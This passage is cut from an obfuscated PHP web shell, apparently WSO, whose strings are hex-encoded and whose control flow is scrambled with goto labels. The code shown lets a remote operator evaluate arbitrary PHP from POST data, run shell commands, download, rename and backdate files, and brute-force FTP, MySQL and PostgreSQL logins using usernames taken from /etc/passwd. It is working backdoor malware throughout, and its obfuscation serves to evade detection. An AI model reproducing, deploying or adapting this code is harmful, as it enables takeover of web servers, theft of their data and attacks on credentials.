$h[0] .= sprintf("\45\x30\x38\x58", $i + 1) . "\74\142\162\x3e"; } goto fObRZ; fMXko: $h[2] .= "\12"; goto BJu_G; BJu_G: } } goto jL3k2; GyLAr: $len = strlen($c); goto Lem2Z; Ufiap: break; goto owLSP; owLSP: case "\x72\145\x6e\x61\155\x65": goto DPp_y; zaQju: break; goto Mf7Ir; DPp_y: if (!empty($_POST["\160\63"])) { if (!@rename($_POST["\x70\61"], $_POST["\x70\x33"])) { echo "\103\x61\x6e\x27\x74\40\x72\x65\x6e\x61\x6d\145\41\74\142\162\76"; } else { die("\74\x73\143\x72\151\x70\164\x3e\147\50\x6e\x75\154\154\54\x6e\165\x6c\154\54\42" . urlencode($_POST["\x70\x33"]) . "\x22\54\x6e\165\x6c\154\54\42\x22\x29\x3c\x2f\x73\x63\x72\x69\160\164\x3e"); } } goto S0xqX; S0xqX: echo "\x3c\x66\x6f\162\x6d\40\157\156\163\x75\142\155\x69\x74\75\x22\147\x28\156\x75\x6c\x6c\54\156\165\154\x6c\x2c\47" . urlencode($_POST["\x70\61"]) . "\47\54\156\165\154\x6c\x2c\x74\150\x69\163\x2e\156\x61\155\145\56\166\141\x6c\x75\x65\x29\x3b\x72\145\x74\x75\x72\x6e\40\146\141\154\163\x65\x3b\42\x3e\x3c\151\x6e\160\165\x74\40\x74\x79\x70\145\x3d\164\145\170\164\x20\x6e\141\155\x65\75\x6e\141\155\x65\40\x76\x61\x6c\x75\145\x3d\42" . htmlspecialchars($_POST["\x70\x31"]) . "\42\x3e\x3c\x69\156\x70\165\x74\x20\x74\171\160\145\75\163\165\142\x6d\x69\x74\40\166\x61\154\x75\x65\x3d\x22\76\x3e\x22\x3e\x3c\57\x66\x6f\x72\155\x3e"; goto zaQju; Mf7Ir: case "\164\x6f\165\x63\150": goto MdNj9; fcpc8: echo "\74\x73\x63\162\151\160\x74\76\x70\x33\x5f\x3d\x22\42\73\x3c\57\x73\143\x72\151\x70\164\x3e\74\146\157\x72\155\x20\x6f\156\163\x75\x62\x6d\x69\164\75\x22\x67\x28\156\165\x6c\154\54\x6e\165\154\154\x2c\47" . urlencode($_POST["\160\x31"]) . "\47\x2c\156\x75\x6c\154\x2c\164\x68\x69\x73\56\164\157\x75\x63\150\56\x76\x61\x6c\165\145\51\73\x72\x65\x74\165\x72\x6e\40\146\141\x6c\163\145\73\42\x3e\74\151\156\x70\x75\x74\x20\x74\x79\x70\145\75\x74\145\x78\164\40\156\x61\x6d\x65\x3d\x74\x6f\x75\143\150\x20\166\141\154\165\145\75\x22" . date("\x59\x2d\155\55\144\40\110\x3a\x69\72\x73", @filemtime($_POST["\160\x31"])) . "\42\x3e\74\x69\156\x70\165\164\x20\x74\x79\x70\145\75\163\165\x62\155\151\164\x20\166\x61\154\x75\145\75\42\76\76\x22\x3e\x3c\x2f\x66\x6f\x72\x6d\x3e"; goto vSHOq; vSHOq: break; goto RapuR; GWQpw: clearstatcache(); goto fcpc8; MdNj9: if (!empty($_POST["\x70\x33"])) { $time = strtotime($_POST["\160\x33"]); if ($time) { if (!touch($_POST["\160\x31"], $time, $time)) { echo "\x46\x61\x69\x6c\x21"; } else { echo "\x54\157\x75\x63\150\x65\144\x21"; } } else { echo "\x42\x61\144\40\x74\x69\x6d\145\40\146\157\162\x6d\x61\164\41"; } } goto GWQpw; RapuR: } goto gIv2Z; nB0r7: if (@$_POST["\160\62"] == "\144\x6f\x77\x6e\x6c\x6f\x61\x64") { if (@is_file($_POST["\160\x31"]) && @is_readable($_POST["\160\x31"])) { goto kEAXk; LrqUY: $fp = @fopen($_POST["\x70\x31"], "\x72"); goto oCCHm; rpfQA: if (function_exists("\155\151\155\x65\x5f\x63\x6f\156\x74\x65\x6e\164\x5f\164\171\160\x65")) { $type = @mime_content_type($_POST["\x70\x31"]); header("\103\157\x6e\164\x65\156\164\55\124\171\x70\x65\x3a\40" . $type); } else { header("\x43\x6f\x6e\164\x65\156\164\55\x54\171\x70\x65\x3a\x20\x61\x70\160\x6c\x69\x63\x61\164\151\157\156\x2f\157\x63\164\145\x74\x2d\163\164\162\145\141\155"); } goto LrqUY; oCCHm: if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } goto Vqm3n; PiFXF: header("\x43\x6f\x6e\x74\145\x6e\x74\55\104\151\x73\x70\x6f\163\151\164\151\157\156\72\x20\x61\164\x74\x61\143\x68\155\x65\156\164\73\40\x66\x69\x6c\x65\x6e\141\x6d\145\x3d" . basename($_POST["\x70\61"])); goto rpfQA; kEAXk: ob_start("\157\x62\137\x67\x7a\x68\x61\156\x64\x6c\145\162", 4096); goto PiFXF; Vqm3n: } exit; } goto tJhrh; XQqyZ: echo "\x3c\x73\160\141\156\76\116\141\155\x65\72\x3c\x2f\x73\160\141\156\76\40" . htmlspecialchars(@basename($_POST["\160\x31"])) . "\40\x3c\163\x70\141\156\x3e\123\x69\172\145\72\x3c\57\x73\x70\x61\156\76\40" . (is_file($_POST["\160\61"]) ? wsoViewSize(filesize($_POST["\160\x31"])) : "\55") . "\x20\74\163\x70\x61\x6e\76\x50\x65\162\155\151\x73\163\151\157\156\x3a\74\x2f\x73\x70\x61\156\x3e\x20" . wsoPermsColor($_POST["\160\61"]) . "\40\x3c\x73\160\x61\156\76\117\x77\x6e\x65\x72\x2f\107\x72\157\165\160\72\74\57\x73\160\x61\156\76\40" . $uid["\156\141\x6d\x65"] . "\x2f" . $gid["\x6e\x61\155\145"] . "\74\x62\162\x3e"; goto vLiGd; lZIie: } goto w2GF1; etiAC: function wsoPerms($p) { goto kfyb8; GUcgT: $i .= $p & 0x1 ? $p & 0x200 ? "\x74" : "\170" : ($p & 0x200 ? "\124" : "\55"); goto mshmE; kfyb8: if (($p & 0xc000) == 0xc000) { $i = "\x73"; } elseif (($p & 0xa000) == 0xa000) { $i = "\x6c"; } elseif (($p & 0x8000) == 0x8000) { $i = "\x2d"; } elseif (($p & 0x6000) == 0x6000) { $i = "\142"; } elseif (($p & 0x4000) == 0x4000) { $i = "\x64"; } elseif (($p & 0x2000) == 0x2000) { $i = "\143"; } elseif (($p & 0x1000) == 0x1000) { $i = "\160"; } else { $i = "\x75"; } goto pqnZD; GuUyD: $i .= $p & 0x2 ? "\167" : "\x2d"; goto GUcgT; Vg6sO: $i .= $p & 0x10 ? "\167" : "\55"; goto vneDY; I8J2d: $i .= $p & 0x40 ? $p & 0x800 ? "\x73" : "\170" : ($p & 0x800 ? "\x53" : "\55"); goto yfJn7; pqnZD: $i .= $p & 0x100 ? "\162" : "\55"; goto FjLaa; yfJn7: $i .= $p & 0x20 ? "\x72" : "\x2d"; goto Vg6sO; FjLaa: $i .= $p & 0x80 ? "\x77" : "\55"; goto I8J2d; vneDY: $i .= $p & 0x8 ? $p & 0x400 ? "\x73" : "\x78" : ($p & 0x400 ? "\123" : "\55"); goto e6Pjl; e6Pjl: $i .= $p & 0x4 ? "\162" : "\x2d"; goto GuUyD; mshmE: return $i; goto MofP7; MofP7: } goto eRZM6; j4eIF: if (!isset($_COOKIE[md5($_SERVER["\110\x54\x54\x50\x5f\x48\117\123\124"]) . "\x61\152\141\170"])) { $_COOKIE[md5($_SERVER["\x48\x54\124\120\137\x48\117\x53\124"]) . "\x61\x6a\141\170"] = (bool) $default_use_ajax; } goto EoPoZ; qZOco: if (isset($_POST["\143"])) { @chdir($_POST["\x63"]); } goto sO9OV; tZUOM: if (strtolower(substr(PHP_OS, 0, 3)) == "\167\x69\156") { $os = "\167\x69\x6e"; } else { $os = "\156\x69\170"; } goto LqaMO; B8b3D: function actionRC() { if (!@$_POST["\160\x31"]) { $a = array("\165\x6e\x61\155\145" => php_uname(), "\160\150\x70\x5f\x76\x65\162\x73\151\x6f\156" => phpversion(), "\167\x73\157\137\166\145\x72\x73\x69\157\156" => WSO_VERSION, "\163\x61\146\145\x6d\157\144\x65" => @ini_get("\x73\141\x66\x65\x5f\x6d\157\x64\145")); echo serialize($a); } else { eval($_POST["\160\61"]); } } goto dPSqc; Gop14: $disable_functions = @ini_get("\x64\151\163\141\142\154\145\x5f\146\x75\156\x63\164\x69\x6f\156\163"); goto oE6Ue; oHsYW: function actionPhp() { goto s1VTJ; ujMFQ: wsoFooter(); goto dfcYP; s1VTJ: if (isset($_POST["\141\x6a\x61\x78"])) { goto jtGxB; XiIjv: eval($_POST["\160\x31"]); goto pcNS1; cL7XN: ob_start(); goto XiIjv; keRr1: exit; goto cNits; t7wh1: echo strlen($temp), "\12", $temp; goto keRr1; pcNS1: $temp = "\x64\x6f\x63\165\155\x65\x6e\164\x2e\x67\145\164\105\x6c\x65\155\145\x6e\164\102\x79\x49\144\x28\x27\120\x68\x70\x4f\165\x74\x70\x75\x74\47\51\56\x73\x74\171\154\145\56\x64\x69\x73\x70\154\x61\171\x3d\47\x27\73\144\157\143\x75\155\x65\x6e\x74\x2e\x67\145\x74\105\x6c\x65\x6d\x65\156\164\x42\171\x49\x64\x28\47\x50\x68\160\117\x75\164\x70\165\164\47\x29\x2e\x69\156\156\145\162\x48\x54\x4d\114\75\x27" . addcslashes(htmlspecialchars(ob_get_clean()), "\xa\15\11\134\x27\x0") . "\x27\73\xa"; goto t7wh1; jtGxB: WSOsetcookie(md5($_SERVER["\110\x54\124\120\x5f\110\117\123\x54"]) . "\x61\x6a\141\x78", true); goto cL7XN; cNits: } goto IyHRn; wcs04: echo "\74\57\160\x72\x65\76\x3c\57\x64\151\x76\76"; goto ujMFQ; Sz7n2: echo "\74\150\61\x3e\105\x78\x65\143\x75\164\x69\x6f\x6e\40\120\x48\120\55\143\x6f\x64\x65\x3c\57\x68\x31\x3e\x3c\144\x69\166\x20\x63\x6c\141\163\x73\x3d\143\157\x6e\x74\x65\x6e\164\x3e\x3c\146\x6f\x72\x6d\40\156\141\x6d\x65\x3d\160\146\x20\x6d\x65\x74\150\x6f\x64\75\160\x6f\x73\164\x20\157\x6e\x73\165\x62\155\x69\164\x3d\42\151\146\50\x74\x68\151\163\x2e\141\x6a\141\x78\x2e\x63\x68\145\143\x6b\145\144\51\x7b\x61\50\x27\x50\x68\x70\x27\x2c\156\x75\154\x6c\54\164\150\x69\x73\56\143\157\144\145\x2e\x76\141\154\x75\145\x29\73\x7d\x65\154\163\145\x7b\147\50\47\x50\x68\160\47\54\x6e\165\x6c\x6c\54\164\x68\x69\163\x2e\143\157\x64\x65\x2e\x76\141\x6c\x75\x65\54\47\47\x29\73\x7d\162\x65\x74\165\x72\x6e\40\146\141\154\x73\x65\x3b\42\76\x3c\164\145\x78\164\141\x72\145\x61\40\156\x61\155\x65\75\x63\x6f\144\145\40\143\x6c\141\x73\x73\x3d\142\151\x67\141\x72\145\x61\x20\151\x64\x3d\120\x68\x70\x43\x6f\144\145\76" . (!empty($_POST["\x70\x31"]) ? htmlspecialchars($_POST["\x70\x31"]) : '') . "\74\x2f\x74\x65\x78\164\x61\162\x65\141\76\74\151\x6e\x70\165\x74\40\x74\x79\160\145\75\x73\x75\x62\155\151\164\x20\x76\x61\x6c\x75\x65\x3d\105\166\x61\x6c\40\163\x74\171\154\x65\x3d\42\x6d\x61\x72\147\151\x6e\55\x74\157\160\x3a\x35\x70\170\x22\x3e"; goto bE4Om; t2vRD: wsoHeader(); goto om2si; oWPfu: if (!empty($_POST["\x70\x31"])) { goto uFjl_; uFjl_: ob_start(); goto XYFVS; qDLEK: echo htmlspecialchars(ob_get_clean()); goto Zre8T; XYFVS: eval($_POST["\160\x31"]); goto qDLEK; Zre8T: } goto wcs04; IyHRn: if (empty($_POST["\x61\152\141\170"]) && !empty($_POST["\160\x31"])) { WSOsetcookie(md5($_SERVER["\110\x54\x54\x50\x5f\110\x4f\x53\124"]) . "\141\x6a\141\170", 0); } goto t2vRD; om2si: if (isset($_POST["\x70\x32"]) && $_POST["\160\x32"] == "\151\156\146\157") { goto u6Vem; u6Vem: echo "\x3c\150\61\76\x50\x48\120\x20\x69\156\146\x6f\74\x2f\x68\x31\76\74\144\x69\166\x20\143\x6c\x61\163\163\75\x63\x6f\156\x74\x65\x6e\x74\76\x3c\163\x74\x79\x6c\145\x3e\x2e\x70\40\x7b\x63\x6f\154\157\x72\x3a\43\x30\60\x30\73\x7d\x3c\57\163\x74\171\x6c\x65\76"; goto ClNOj; ClNOj: ob_start(); goto Z0UYj; WpKFt: $tmp = preg_replace(array("\x21\50\142\157\144\x79\174\x61\x3a\134\167\53\174\142\x6f\x64\x79\x2c\40\x74\144\54\x20\164\150\54\x20\x68\x31\x2c\x20\x68\x32\51\40\x7b\56\52\x7d\x21\x6d\163\151\125", "\41\x74\144\x2c\40\164\150\x20\173\x28\x2e\52\51\x7d\x21\x6d\x73\x69\125", "\x21\x3c\151\x6d\x67\x5b\x5e\76\x5d\x2b\76\41\x6d\163\x69\125"), array('', "\56\145\54\40\56\x76\x2c\x20\x2e\x68\x2c\40\56\x68\40\164\150\40\x7b\x24\61\x7d", ''), $tmp); goto AiOL8; Z0UYj: phpinfo(); goto pDREm; pDREm: $tmp = ob_get_clean(); goto WpKFt; AiOL8: echo str_replace("\74\x68\x31", "\x3c\x68\x32", $tmp) . "\x3c\x2f\144\x69\x76\x3e\74\x62\162\x3e"; goto xiXKW; xiXKW: } goto Sz7n2; bE4Om: echo "\x20\74\151\156\160\165\x74\40\164\171\x70\x65\x3d\143\x68\x65\x63\x6b\x62\x6f\x78\x20\x6e\x61\155\x65\x3d\141\x6a\141\x78\x20\166\141\154\165\x65\75\x31\x20" . ($_COOKIE[md5($_SERVER["\110\x54\124\120\x5f\110\x4f\x53\x54"]) . "\141\152\141\170"] ? "\x63\150\x65\x63\153\x65\x64" : '') . "\76\x20\163\145\156\x64\x20\165\163\151\x6e\x67\x20\x41\x4a\x41\130\x3c\x2f\x66\x6f\x72\x6d\76\74\x70\x72\145\x20\151\144\75\120\x68\x70\x4f\165\x74\160\165\x74\40\x73\164\171\x6c\145\75\42" . (empty($_POST["\x70\x31"]) ? "\144\151\x73\160\x6c\141\171\x3a\156\157\156\x65\x3b" : '') . "\155\x61\x72\x67\x69\x6e\55\164\x6f\x70\x3a\65\x70\170\73\42\x20\x63\x6c\x61\163\x73\x3d\155\154\x31\76"; goto oWPfu; dfcYP: } goto N84uU; jB3VR: $default_charset = "\127\x69\156\x64\157\167\x73\55\61\62\65\x31"; goto fj9OS; rTVjF: function actionLogout() { setcookie(md5($_SERVER["\x48\x54\124\x50\x5f\110\117\123\x54"]), '', time() - 3600); die("\142\171\x65\x21"); } goto i6mTz; DbGtY: function actionBruteforce() { goto uMF9i; hSv50: if (isset($_POST["\x70\162\x6f\x74\157"])) { goto jX4Q5; UnBlf: if ($_POST["\164\x79\x70\x65"] == 1) { $temp = @file("\57\x65\164\x63\x2f\160\x61\x73\x73\x77\144"); if (is_array($temp)) { foreach ($temp as $line) { goto vXxXO; zFefs: if (@$_POST["\x72\145\166\x65\x72\163\x65"]) { goto S2jvF; oahSQ: for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } goto rxcry; S2jvF: $tmp = ''; goto oahSQ; rxcry: ++$attempts; goto TfDj5; TfDj5: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "\74\142\x3e" . htmlspecialchars($line[0]) . "\74\x2f\142\x3e\x3a" . htmlspecialchars($tmp); } goto lNTnA; lNTnA: } goto i039d; b2CQw: ++$attempts; goto i1_FI; i1_FI: if (wsoBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "\74\142\x3e" . htmlspecialchars($line[0]) . "\74\x2f\142\x3e\72" . htmlspecialchars($line[0]) . "\x3c\x62\x72\76"; } goto zFefs; vXxXO: $line = explode("\x3a", $line); goto b2CQw; i039d: } } } elseif ($_POST["\164\171\x70\145"] == 2) { $temp = @file($_POST["\x64\x69\x63\164"]); if (is_array($temp)) { foreach ($temp as $line) { goto kf0wF; NI_R6: if (wsoBruteForce($server[0], @$server[1], $_POST["\x6c\x6f\147\151\156"], $line)) { $success++; echo "\74\142\76" . htmlspecialchars($_POST["\154\x6f\x67\x69\x6e"]) . "\x3c\57\x62\76\72" . htmlspecialchars($line) . "\x3c\142\162\76"; } goto JCePy; kf0wF: $line = trim($line); goto byC2k; byC2k: ++$attempts; goto NI_R6; JCePy: } } } goto VERJt; jX4Q5: echo "\74\x68\x31\76\122\x65\x73\x75\x6c\164\x73\74\x2f\150\x31\x3e\x3c\144\x69\166\x20\x63\154\x61\x73\163\75\143\157\x6e\x74\145\156\x74\x3e\x3c\x73\x70\141\x6e\x3e\x54\171\x70\x65\x3a\74\x2f\x73\160\x61\156\x3e\40" . htmlspecialchars($_POST["\160\162\x6f\x74\157"]) . "\40\74\x73\160\141\x6e\76\x53\145\x72\x76\145\x72\x3a\74\57\x73\x70\141\156\x3e\40" . htmlspecialchars($_POST["\163\x65\162\x76\x65\x72"]) . "\x3c\x62\x72\x3e"; goto LBJl4; VERJt: echo "\x3c\x73\x70\141\156\76\x41\164\x74\145\155\160\164\x73\72\x3c\x2f\x73\x70\141\156\76\40{$attempts}\40\x3c\x73\x70\x61\x6e\x3e\x53\165\x63\x63\145\x73\163\72\74\57\163\x70\141\156\76\40{$success}\74\57\144\x69\166\x3e\74\142\162\x3e"; goto U2KZG; ObcWW: $server = explode("\72", $_POST["\x73\145\162\166\x65\x72"]); goto UnBlf; LBJl4: if ($_POST["\160\x72\x6f\164\x6f"] == "\146\x74\x70") { function wsoBruteForce($ip, $port, $login, $pass) { goto w1bnC; MJhTf: @ftp_close($fp); goto efLYK; efLYK: return $res; goto zU7bZ; aqJAG: $res = @ftp_login($fp, $login, $pass); goto MJhTf; w1bnC: $fp = @ftp_connect($ip, $port ? $port : 21); goto NYGOQ; NYGOQ: if (!$fp) { return false; } goto aqJAG; zU7bZ: } } elseif ($_POST["\160\x72\x6f\x74\x6f"] == "\x6d\171\163\x71\x6c") { function wsoBruteForce($ip, $port, $login, $pass) { goto nwkI1; tqKjk: @mysqli_close($res); goto lNvU5; nwkI1: $res = @mysqli_connect($ip . "\72" . $port ? $port : 3306, $login, $pass); goto tqKjk; lNvU5: return $res; goto h_hcl; h_hcl: } } elseif ($_POST["\160\162\x6f\x74\x6f"] == "\x70\147\163\161\x6c") { function wsoBruteForce($ip, $port, $login, $pass) { goto ucMyA; DgnPW: @pg_close($res); goto qQMP_; qQMP_: return $res; goto N73qn; ucMyA: $str = "\x68\x6f\x73\164\x3d\x27" . $ip . "\x27\40\160\x6f\162\164\75\x27" . $port . "\x27\x20\165\163\145\162\x3d\x27" . $login . "\x27\x20\160\x61\163\x73\x77\x6f\162\x64\x3d\x27" . $pass . "\x27\x20\144\x62\156\x61\155\x65\75\160\x6f\x73\x74\147\x72\145\163"; goto szIUy; szIUy: $res = @pg_connect($str); goto DgnPW; N73qn: } } goto px18Z; px18Z: $success = 0; goto aKdd5; aKdd5: $attempts = 0; goto ObcWW; U2KZG: } goto NNTq8; NNTq8: echo "\x3c\150\x31\76\x42\x72\x75\164\145\x66\x6f\162\x63\x65\74\x2f\x68\x31\76\x3c\x64\151\166\x20\143\x6c\x61\163\x73\x3d\x63\157\x6e\x74\145\156\164\x3e\74\x74\141\x62\x6c\145\x3e\74\146\157\162\x6d\40\x6d\x65\x74\150\x6f\x64\75\x70\x6f\x73\x74\x3e\74\164\162\x3e\74\x74\144\x3e\x3c\163\x70\x61\x6e\x3e\124\x79\160\145\x3c\57\163\x70\141\x6e\x3e\x3c\x2f\x74\144\x3e" . "\74\164\x64\76\74\163\145\x6c\x65\143\164\40\x6e\x61\x6d\x65\x3d\160\x72\157\x74\x6f\76\x3c\157\160\164\151\157\156\40\166\141\x6c\165\x65\x3d\146\x74\x70\x3e\106\124\120\74\x2f\x6f\160\x74\x69\x6f\x6e\76\74\x6f\160\164\151\x6f\x6e\x20\166\x61\x6c\165\145\x3d\x6d\171\163\x71\x6c\76\115\171\x53\x71\x6c\x3c\x2f\157\x70\x74\151\157\156\x3e\x3c\x6f\160\x74\151\x6f\156\40\166\141\154\x75\x65\75\160\x67\x73\161\154\76\120\x6f\163\164\147\x72\145\123\161\x6c\74\x2f\x6f\x70\164\x69\x6f\x6e\76\x3c\x2f\x73\145\154\145\x63\x74\76\74\57\164\144\76\74\x2f\x74\x72\76\x3c\x74\162\x3e\74\164\144\76" . "\74\151\156\160\165\164\40\x74\x79\160\145\x3d\x68\151\x64\x64\x65\x6e\x20\156\141\155\x65\75\x63\x20\166\x61\154\165\145\x3d\x22" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\42\76" . "\74\151\156\x70\x75\x74\x20\x74\x79\160\x65\x3d\150\x69\x64\144\x65\x6e\x20\x6e\x61\x6d\x65\75\x61\x20\x76\141\154\165\145\x3d\x22" . htmlspecialchars($_POST["\141"]) . "\42\x3e" . "\x3c\x69\156\160\165\164\40\x74\x79\160\x65\x3d\150\151\x64\x64\145\156\40\x6e\x61\155\145\x3d\143\150\x61\162\x73\x65\x74\x20\166\x61\x6c\x75\x65\75\42" . htmlspecialchars($_POST["\143\150\141\x72\163\145\x74"]) . "\x22\x3e" . "\74\x73\x70\141\x6e\x3e\123\x65\162\x76\x65\162\72\160\x6f\162\x74\74\x2f\x73\160\141\156\76\x3c\x2f\x74\144\76" . "\74\x74\144\x3e\x3c\x69\156\160\165\x74\x20\x74\171\160\145\75\164\x65\x78\x74\40\x6e\x61\155\x65\75\163\x65\x72\x76\x65\162\x20\x76\141\154\x75\145\x3d\42\61\x32\x37\56\60\x2e\60\56\x31\x22\76\x3c\57\x74\144\76\74\57\x74\162\76" . "\x3c\164\x72\76\74\164\144\76\x3c\163\160\141\156\x3e\102\162\165\164\145\x20\164\x79\160\x65\74\x2f\163\x70\x61\x6e\76\x3c\57\164\x64\76" . "\x3c\x74\x64\76\74\x6c\141\x62\145\x6c\76\74\x69\x6e\x70\165\164\x20\164\x79\x70\145\x3d\162\x61\144\x69\x6f\40\156\141\x6d\145\x3d\164\171\160\145\40\x76\141\154\x75\145\75\42\x31\42\x20\x63\150\145\x63\153\145\x64\76\x20\x2f\x65\164\x63\x2f\x70\141\163\163\x77\x64\x3c\x2f\154\141\142\145\x6c\x3e\x3c\x2f\x74\144\76\74\57\x74\162\76" . "\x3c\164\162\x3e\x3c\164\144\x3e\74\x2f\x74\144\76\74\164\x64\x3e\x3c\154\x61\142\145\154\40\163\164\x79\x6c\145\x3d\42\x70\x61\x64\x64\151\x6e\147\55\x6c\x65\146\x74\72\61\x35\160\170\42\x3e\74\151\x6e\160\165\x74\40\x74\x79\160\145\x3d\x63\x68\145\x63\x6b\142\157\x78\x20\156\141\x6d\145\x3d\162\x65\x76\145\162\163\x65\40\x76\x61\154\165\145\75\61\40\x63\x68\145\143\x6b\145\x64\76\40\162\145\x76\145\162\163\145\x20\x28\x6c\157\x67\x69\156\40\55\x3e\x20\x6e\x69\147\157\x6c\x29\x3c\x2f\x6c\x61\x62\x65\x6c\76\74\57\x74\144\x3e\74\57\x74\162\x3e" . "\x3c\164\162\x3e\x3c\164\144\x3e\74\x2f\x74\144\76\x3c\x74\x64\76\74\x6c\x61\142\145\154\76\74\x69\156\x70\165\164\40\164\x79\x70\145\x3d\162\x61\144\151\157\x20\156\x61\x6d\x65\75\x74\x79\x70\x65\40\166\x61\x6c\165\x65\75\42\x32\x22\x3e\x20\104\151\143\164\151\157\x6e\141\162\171\74\x2f\x6c\x61\x62\x65\154\76\74\x2f\x74\x64\x3e\74\x2f\x74\162\76" . "\74\164\x72\76\74\164\144\x3e\74\x2f\164\x64\76\74\x74\144\x3e\x3c\164\141\142\x6c\x65\40\163\x74\171\154\x65\75\x22\160\141\144\x64\151\x6e\x67\x2d\154\145\x66\164\x3a\x31\65\x70\170\42\x3e\x3c\164\x72\x3e\x3c\164\x64\76\74\x73\x70\x61\156\76\114\x6f\x67\151\156\x3c\x2f\163\160\x61\156\x3e\74\x2f\164\144\76" . "\x3c\164\144\76\x3c\x69\x6e\160\165\x74\x20\x74\171\x70\145\x3d\x74\145\x78\x74\x20\x6e\x61\155\145\x3d\x6c\x6f\x67\151\x6e\40\x76\x61\x6c\x75\x65\75\x22\162\x6f\157\x74\42\x3e\74\x2f\x74\x64\76\x3c\57\x74\162\76" . "\x3c\x74\162\76\x3c\164\144\x3e\x3c\x73\160\x61\156\76\104\151\143\164\x69\157\x6e\141\x72\171\74\57\x73\x70\141\156\76\74\57\x74\x64\x3e" . "\x3c\164\x64\x3e\74\151\x6e\x70\x75\x74\x20\164\x79\160\145\x3d\x74\x65\170\x74\40\x6e\x61\155\145\75\x64\151\143\164\40\x76\141\x6c\x75\145\75\42" . htmlspecialchars($GLOBALS["\143\x77\144"]) . "\x70\x61\163\163\x77\144\56\144\x69\x63\x22\76\x3c\57\x74\x64\76\x3c\57\164\162\x3e\74\x2f\x74\x61\142\x6c\x65\x3e" . "\x3c\57\164\144\76\74\57\164\162\76\74\164\162\x3e\74\164\x64\76\x3c\57\x74\x64\76\74\x74\144\76\x3c\151\156\x70\165\164\x20\164\x79\160\145\75\163\165\x62\155\151\x74\x20\x76\x61\x6c\165\x65\x3d\42\76\x3e\42\x3e\74\57\x74\x64\76\x3c\57\x74\162\x3e\x3c\x2f\146\x6f\x72\x6d\76\74\57\164\141\x62\154\x65\x3e"; goto HIh7o; uMF9i: wsoHeader(); goto hSv50; HIh7o: echo "\x3c\x2f\x64\x69\x76\x3e\x3c\142\x72\76"; goto wlwoF; wlwoF: wsoFooter(); goto p3uSI; p3uSI: } goto wVO2a; uf2tU: $default_use_ajax = true; goto jB3VR; d62j5: function wsoEx($in) { $out = shell_exec($in); return $out; } goto yXkOt; wVO2a: function actionSql() { goto pXyEP; WqMW0: if (@$_POST["\x74\x79\x70\x65"] == "\x70\x67\163\x71\154") { echo "\163\x65\154\145\143\164\145\x64"; } goto bZFnU; qgUXu: echo "\74\x2f\x64\151\x76\x3e"; goto G862b; G862b: wsoFooter(); goto gsteZ; bZFnU: echo "\76\120\x6f\163\x74\x67\162\x65\123\x71\154\74\57\157\160\164\x69\157\156\76\x3c\57\163\145\154\145\143\164\76\74\57\164\x64\x3e\15\xa\74\x74\144\x3e\x3c\151\156\x70\165\x74\x20\164\x79\x70\x65\x3d\164\145\x78\164\x20\x6e\141\155\x65\75\x73\161\154\x5f\150\157\x73\x74\x20\166\x61\x6c\x75\145\x3d\42" . (empty($_POST["\163\x71\x6c\137\x68\157\x73\164"]) ? "\x6c\157\x63\x61\x6c\x68\157\163\164" : htmlspecialchars($_POST["\163\161\154\x5f\150\157\x73\164"])) . "\42\x3e\74\x2f\x74\144\76\xd\12\74\164\144\76\74\151\x6e\160\165\164\40\164\x79\x70\145\75\x74\x65\170\x74\40\156\x61\x6d\x65\75\163\x71\154\x5f\x6c\x6f\147\151\156\x20\x76\x61\154\165\145\75\42" . (empty($_POST["\x73\x71\x6c\x5f\x6c\x6f\147\x69\156"]) ? "\162\157\157\164" : htmlspecialchars($_POST["\x73\161\154\x5f\154\x6f\x67\151\156"])) . "\42\x3e\x3c\x2f\164\144\x3e\15\xa\74\164\x64\76\74\151\x6e\x70\165\164\40\164\x79\160\145\75\164\x65\170\164\x20\x6e\141\x6d\145\x3d\x73\161\x6c\137\x70\141\163\163\x20\166\141\x6c\x75\x65\x3d\42" . (empty($_POST["\x73\161\x6c\137\160\x61\163\163"]) ? '' : htmlspecialchars($_POST["\x73\161\x6c\x5f\x70\x61\163\163"])) . "\x22\x3e\74\x2f\x74\144\76\x3c\164\x64\76"; goto dxViD; dxViD: $tmp = "\x3c\151\x6e\x70\x75\x74\x20\x74\x79\x70\145\75\164\x65\x78\164\40\x6e\141\x6d\x65\75\163\161\x6c\137\142\x61\x73\145\x20\166\141\x6c\165\x65\x3d\47\x27\x3e"; goto L_VIT; Auorx: echo "\74\x2f\x74\144\x3e\xd\xa\x9\11\x9\11\x3c\x74\x64\x3e\74\151\x6e\160\165\164\40\x74\x79\160\145\75\x73\x75\142\155\x69\x74\x20\x76\x61\x6c\165\145\x3d\47\76\76\x27\40\157\x6e\x63\154\x69\x63\x6b\75\47\146\x73\x28\x64\56\x73\x66\51\x3b\x27\76\x3c\x2f\x74\144\76\xd\xa\40\40\40\40\40\40\x20\40\x20\x20\40\40\40\40\x20\x20\74\164\144\76\x3c\151\156\x70\165\164\40\x74\171\160\145\x3d\143\x68\x65\143\x6b\x62\157\170\x20\x6e\141\155\145\75\x73\161\x6c\137\x63\x6f\165\156\x74\x20\x76\x61\154\165\x65\x3d\47\x6f\156\x27" . (empty($_POST["\x73\x71\154\137\x63\x6f\165\x6e\164"]) ? '' : "\x20\143\x68\x65\143\153\145\144") . "\76\40\143\157\165\156\164\x20\x74\x68\x65\40\x6e\x75\155\x62\x65\162\40\157\x66\40\162\157\x77\x73\x3c\57\x74\144\76\xd\xa\11\11\x9\x3c\x2f\x74\x72\x3e\xd\xa\x9\11\74\x2f\x74\x61\142\x6c\x65\76\15\12\11\x9\74\x73\x63\162\151\160\164\76\xd\12\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\163\x5f\144\142\75\47" . @addslashes($_POST["\163\x71\x6c\x5f\x62\x61\x73\x65"]) . 